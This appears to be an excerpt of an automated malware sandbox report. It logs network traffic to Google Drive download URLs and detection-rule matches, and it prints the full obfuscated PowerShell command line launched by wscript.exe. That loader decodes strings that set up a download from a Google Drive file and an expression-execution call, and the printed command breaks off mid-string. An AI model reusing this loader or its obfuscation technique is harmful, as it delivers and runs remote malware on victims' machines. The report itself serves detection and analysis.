Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: unknown |
HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49699 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49700 version: TLS 1.2 |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: amsi64_1132.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1132, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigit |